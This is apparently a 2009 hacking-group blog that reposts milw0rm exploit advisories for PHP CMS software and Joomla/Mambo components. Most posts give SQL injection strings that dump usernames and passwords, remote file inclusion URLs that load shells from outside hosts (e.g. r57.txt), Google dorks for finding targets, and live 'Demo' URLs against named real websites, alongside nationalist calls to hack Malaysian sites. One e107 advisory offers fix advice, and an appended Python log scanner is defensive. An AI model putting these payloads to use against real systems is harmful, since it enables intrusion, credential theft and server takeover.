
Tuesday, September 15, 2009

Chief Content Management System

##############################################################
## Chief Content Management System - news.php?id= ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 14, 2009 ##
##############################################################
/~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_
/~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___
/~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____
____________________________________________________________
-=- KILL-9 CREW -=- INDONESIANCODER -=-

##############################################################


[ Software Information ]

[+] Vendor : http://www.chiefcms.com/
[+] Software : Chief Content Management System
[+] Vulnerability : SQL injection
[+] Dork : "Powered by The Chief"

##############################################################

[ Vulnerable File ]

http://127.0.0.1/news.php?id=[KILL-9 Crew SQLi]


[ Exploit ]

-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

[ Demo ]

http://www.chiefcms.com/news.php?id=-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

##############################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] Don Tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_aneh
[+] Contrex,onthel,yasea,bugs,olivia,Jovan1,Aar,Ardy
[+] Coracore,black666girl,chitoz,NepT,ichal,tengik and YOU!!

[ NOTE ]

This is My birthday i am 18 !!


[ QUOTE ]

"Here is my chest, where is yours?

If Malaysia wants an economic confrontation, let us face it with economic confrontation
If Malaysia wants a political confrontation, let us face it with political confrontation
If Malaysia wants a military confrontation, let us face it with military confrontation

Soekarno, 1963”

Soekarno: I hereby declare "CRUSH MALAYSIA"

FUCK MALAYSIA !!!



# www.indonesiancoder.com

Clicknet CMS v2.1 Remote File Inclusion

################################################################
## Clicknet CMS v2.1 Remote File Inclusion ##
## Author : Don Tukulesto (root[at]indonesiancoder[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, September 14, 2009 ##
################################################################

[ Software Information ]

[+] Clicknet CMS v2.1(index.php) Remote File Inclusion
[+] Vendor : http://cms.clicknet.dk
[+] Download : http://cms.clicknet.dk/download/index.php?test=2
[+] Dork : “Powered by Clicknet CMS”

################################################################


[ ExPL0!T ]

http://127.0.0.1/index.php?_SERVER[DOCUMENT_ROOT]=[WWW.INDONESIANCODER.COM]

[ D3M0]

http://www.kimage.dk/fotografisk/?_SERVER[DOCUMENT_ROOT]=

################################################################

[ Greetings ]

[+] Indonesian Coder, SurabayaHackerLink, ServerIsDown, Mainhack Brotherhood
[+] M3NW5, BH4ND55, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, Senot, Joker, oghy, Den Awink
Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d, TUCKER, Ian Petrucii, Chercut, B4YU5154, Baim
[+] bejat Bejat, Plaque, Tuex, rey_cute, BenyCooL, D3miT_EvoLUtiOn, XNITRO, DraCoola.com
[+] Jack-, Yadoy666 + MIYA666, kecemplungkalen, xshadow, exnome, H4ck3rKu, kaMtiEz, Arianom,
[+] V3N0M, tiw0l, Pathloader and YOU !!!

[ QUOTE ]

“Here is my chest, where is yours?

If Malaysia wants an economic confrontation, let us face it with economic confrontation
If Malaysia wants a political confrontation, let us face it with political confrontation
If Malaysia wants a military confrontation, let us face it with military confrontation

Soekarno, 1963”

fvck MALAYSIA !!!


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Thursday, September 10, 2009

Mambo Component com_hestar Remote SQL Injection Vulnerability

## com_hestar 1.0.0 ##
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, September 07,2009 ##


[ Software Information ]

[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"

#####################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--


[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#####################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari, eldest daughter of the family of Mr. Dodi and Mrs. Dini ^^ i lope yu pull...

# milw0rm.com [2009-09-09]

Thursday, April 23, 2009

WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities

script:webportal-0.8-beta
-------------------------------------------------
Author: ahmadbady
email: kivi_hacker666@yahoo.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=--
download from:https://sites.google.com/site/ivanoculmine/Home/webportal-0.8-beta.zip?attredirects=0

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--===-=--=-=-=
xpl:

http://127.0.0.1/path/webportal-0.8-beta/libraries/helpdocs/help.php?lang=[local file]

http://127.0.0.1/path/webportal-0.8-beta/indexk.php?lib_path=http://site.com/shell.txt?

http://127.0.0.1/path/webportal-0.8-beta/index.php?error=[local file]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-


# milw0rm.com [2009-04-22]




Wednesday, March 11, 2009

CMS WEBjump! Multiple SQL Injection Vulnerabilities

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contact : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="

Exploit : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="

Exploit : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]




Friday, March 6, 2009

Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability

Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen

Vendor : http://jogjacamp.com

bugs : /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew, don't just play games all the time :p

# milw0rm.com [2009-03-03]



Thursday, February 26, 2009

[waraxe-2004-SA#031] Multiple vulnerabilities in e107 version 0.615

www.waraxe.us

Author: Janek Vind "waraxe"
Date: 29. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=31

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the official e107 Website - e107 is a portal / content management system powered by PHP and mySQL that gives you a totally dynamic and professional website out of the box.
Its simple wizard type install process will have you up and running in 5 minutes, and best of all it's completely free.

Homepage: http://e107.org/

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, some conditions have to be met on victim server, to be vulnerable:

1. "register_globals" must be "on"
2. mysql must be version 4.x with enabled UNION functionality.

Now, let's discuss those security flaws:

A - Full Path Disclosure:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Many software developers, webmasters, admins and other IT staff underestimate full path disclosure as a security bug.
Anyway, this information - the full path to the script - must be kept secret when possible, or it will be one little piece of the puzzle amongst many other pieces, which finally will lead to a successful attack on the website.

A1 - many scripts can be accessed directly and this will provoke standard php error messages, which leads to full path disclosure.

Examples:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php

... and many-many more, needed to be fixed!

B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A potential attacker can use XSS to steal cookies, to read cross-domain forms, etc.
Finally it can lead to admin account compromise and overtaking of the website.

B1 - xss in clock_menu.php through direct access of the script:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

B2 - xss in feature called "email article to a friend":
attacker must be logged off and will enter to inputfield "logged name" this: foobar'>

B3 - xss in feature called "submit news":
Attacker is logged off and will enter to inputfield "logged name" this: foobar'>

B4 - xss in "user settings":
attacker is logged on and makes POST request like this: http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]


C - Remote file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote inclusion - this is a VERY DANGEROUS security hole.
If php is configured with "allow_url_fopen=on" and there is no firewall, which blocks outbound connections, then potential attacker can force VICTIM's php engine to parse ATTACKER's php code!!
This can lead to shell-level server compromise (if there are permissions to execute system commands) with "nobody" or "apache" privileges.
Attacker can then try some local r00t exploits and finally server is 0wned ;)

C1 - remote file inclusion in "secure_img_render.php"
script: http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Remark: "register_globals" must be "on" to be successful in exploiting in this way.

D - Sql injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Through SQL injection a potential attacker can gather any information he wants from the database,
including the admin's username and the password's md5 hash.
There are only 1...2 steps more to taking over the admin's account...

D1 - critical sql injection bug #1 in "content.php" script:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

D2 - critical sql injection bug #2 in "content.php" script:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*

D3 - critical sql injection bug in "news.php" script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, I suggest using the newer version 0.616, which seems to be patched against the bugs discussed above.
And of course, you are welcome to visit forum on my homepage at http://www.waraxe.us/forum/ , where you can find tutorial about manual fixes.

See ya there!

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix for helping me in bughunting!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------
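
A defensive counterpart to the request shapes in the advisories on this page, as an added example that is not part of any original post: an access-log scanner that flags superglobal or include-path overrides in the query string and UNION SELECT payloads, including the `/**/` spacing used in the e107 examples. The rule names, the sample log lines and the example.test hosts are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Request line inside a Common/Combined Log Format entry. The target is matched
# lazily up to the trailing HTTP/x.y so raw spaces in the URL do not truncate it.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/\d(?:\.\d)?"')

# PHP superglobals that register_globals-era code lets a query string overwrite.
SUPERGLOBAL = re.compile(
    r"^(_SERVER|_GET|_POST|_COOKIE|_ENV|_FILES|_REQUEST|_SESSION|GLOBALS)\[")

# Include-path variables named in the advisories on this page; a legitimate
# client never has a reason to send them.
INCLUDE_PATH_PARAMS = {
    "mosConfig_absolute_path", "context[path_to_root]",
    "lib_path", "sitePath", "_shop_path",
}

REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.IGNORECASE)


def scan_target(target):
    """Return the sorted rule names that a request target (path?query) triggers."""
    _, _, query = target.partition("?")
    hits = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL.match(name):
            hits.add("superglobal-override")
        if name in INCLUDE_PATH_PARAMS:
            hits.add("include-path-override")
        if REMOTE_URL.match(value):
            hits.add("remote-url-value")
    # Run the SQL check on the whole decoded query: some payloads have no
    # name=value shape, and /**/ is used in place of spaces.
    decoded = SQL_COMMENT.sub(" ", unquote_plus(query))
    if UNION_SELECT.search(decoded):
        hits.add("sqli-union-select")
    return sorted(hits)


def scan_log(lines):
    """Return [(line_number, [rules])] for every log line with at least one hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            rules = scan_target(match.group("target"))
            if rules:
                findings.append((number, rules))
    return findings


# Constructed sample log lines (documentation addresses and example.test hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2009:10:00:01 +0000] "GET /news.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [15/Sep/2009:10:00:02 +0000] "GET /news.php?id=-666+union+select+1,2,3-- HTTP/1.1" 200 812',
    '192.0.2.11 - - [15/Sep/2009:10:00:03 +0000] "GET /content.php?content.99/**/UNION/**/SELECT/**/null,null/**/FROM/**/e107_user/* HTTP/1.1" 200 640',
    '192.0.2.12 - - [15/Sep/2009:10:00:04 +0000] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://files.example.test/x.txt? HTTP/1.1" 200 77',
    '192.0.2.12 - - [15/Sep/2009:10:00:05 +0000] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://files.example.test/x.txt? HTTP/1.1" 200 91',
    '192.0.2.13 - - [15/Sep/2009:10:00:06 +0000] "GET /out.php?next=https://example.test/ HTTP/1.1" 302 0',
    '192.0.2.14 - - [15/Sep/2009:10:00:07 +0000] "GET /index.php?option=com_hestar&task=showlist&id=-3 union select 1 HTTP/1.1" 200 433',
]

if __name__ == "__main__":
    for number, rules in scan_log(SAMPLE_LOG):
        print(number, ", ".join(rules))
```

The remote-url-value rule also fires on legitimate redirect parameters (sample line 6), so treat it as a lead to correlate with the other rules rather than a verdict.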


Tuesday, February 17, 2009

Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability

######################################################
#
# MAMBO Modules SWmenu 4.0 (ImageManager.php) Remote File Include Vulnerabilities
#
######################################################
#
# script : http://mamboxchange.com/frs/download.php/8109/com_swmenufree4.0.zip
#
######################################################
#
# file : /ImageManager/Classes/ImageManager.php
#
######################################################
#
# Dork : index.php?option=com_swmenupro
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell
#
######################################################
#
# require_once($mosConfig_absolute_path."/administrator/components/com_swmenupro/ImageManager/Classes/Files.php");
#
######################################################
#
# Exploit :
#
# Here one : http://www.example.com/MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
# Or : http://www.example.com/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
######################################################


---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| | Kof2002 | |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
| The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# milw0rm.com [2007-03-23]



Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

==================================================
Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================



#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-10]


Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.

Key Features:

* Displaying the Qur'an in Arabic and its translations.
* Enhanced with search function (using any keywords or by chapter number and verse number).
* Arabic recitation for both listening and downloading.
* Very user friendly.
* Using mysql database instead of file text.

Available translations at the moment:

* English
* Indonesian

You can get them all at http://www.kyantonius.com.


+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz

# milw0rm.com [2008-02-15]




YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability

-----------------[remote file include]-----------------

script: YACS version 8.11

------------------------------------------------------------------

download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip


==============================================
vul: /yacs/scripts/update_trailer.php line 21 23 25;


include_once $context['path_to_root'].'shared/safe.php';      // line 21
if(!class_exists('i18n'))
    include_once $context['path_to_root'].'i18n/i18n.php';    // line 23
if(!class_exists('SQL'))
    include_once $context['path_to_root'].'shared/sql.php';   // line 25



==============================================

dork: "Powered by yacs"
----------------------------------------------

xpl:

http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

***************************************************

---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-16]



Thursday, February 12, 2009

Joomla and Mambo eWriting 1.2.1 Components - SQL injection

eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don
# BHack
# b4lc4n.org
# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"


Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--


Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--


+++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]


==============================================================
EXAMPLE FROM ME :

http://sexxxploration.com/cms/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--




Friday, November 28, 2008

Joomla - com_books SQL Injection

#################################################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Module_Name: com_books
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_books"
#################################################################################

#[~] Example:
index.php?option=com_books&task=book_details&book_id=[exploit]



#[~]Exploit:
-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-11-11]




Saturday, November 15, 2008

dynaWeb - Remote File Include

#############################################################
# Application Name : dynaWeb
# Vulnerable Type : Remote File Include
# Infection : Access to the site and the server can be obtained.
# Bug Fix Advice : Undefined values must be defined.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################

< -- bug code start -- >

http://Site/Path/siteQuery.php?sitePath=[Shell]

< -- bug code end of -- >





VIVA INDONESIAN CODER TEAM
Get The Code and Feel The SOUL

phpxD - Remote File Include

#############################################################
# Application Name : phpxD
# Vulnerable Type : Remote File Include
# Infection : Access to the site and the server can be obtained.
# Bug Fix Advice : Undefined values must be defined.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################


Vuln Path :

http://Site/Path/include/parser.php?path=[Shell]
http://Site/Path/include/dtd.php?path=[Shell]
http://site/path/include/dom.php?path=[shell]






BBShop 4.5 Final - Multiple RFI

[o] BBShop 4.5 Final Multiple Remote File Inclusion Vulnerability
Software : BBShop version 4.5
Vendor : http://zzem.co.kr/
Developer : The Win
Author : NoGe

[o] Vulnerable file
bbshop/shop/index.php
bbshop/shop/main.php
bbshop/admin/admin.php
bbshop/admin/index.php
all of these files are affected by the _shop_path variable

[o] Exploit
http://localhost/[path]/bbshop/shop/index.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/shop/main.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/admin.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/index.php?_shop_path=[evilcode]

[o] Dork
"bbshop"

NoGe.ZoNe

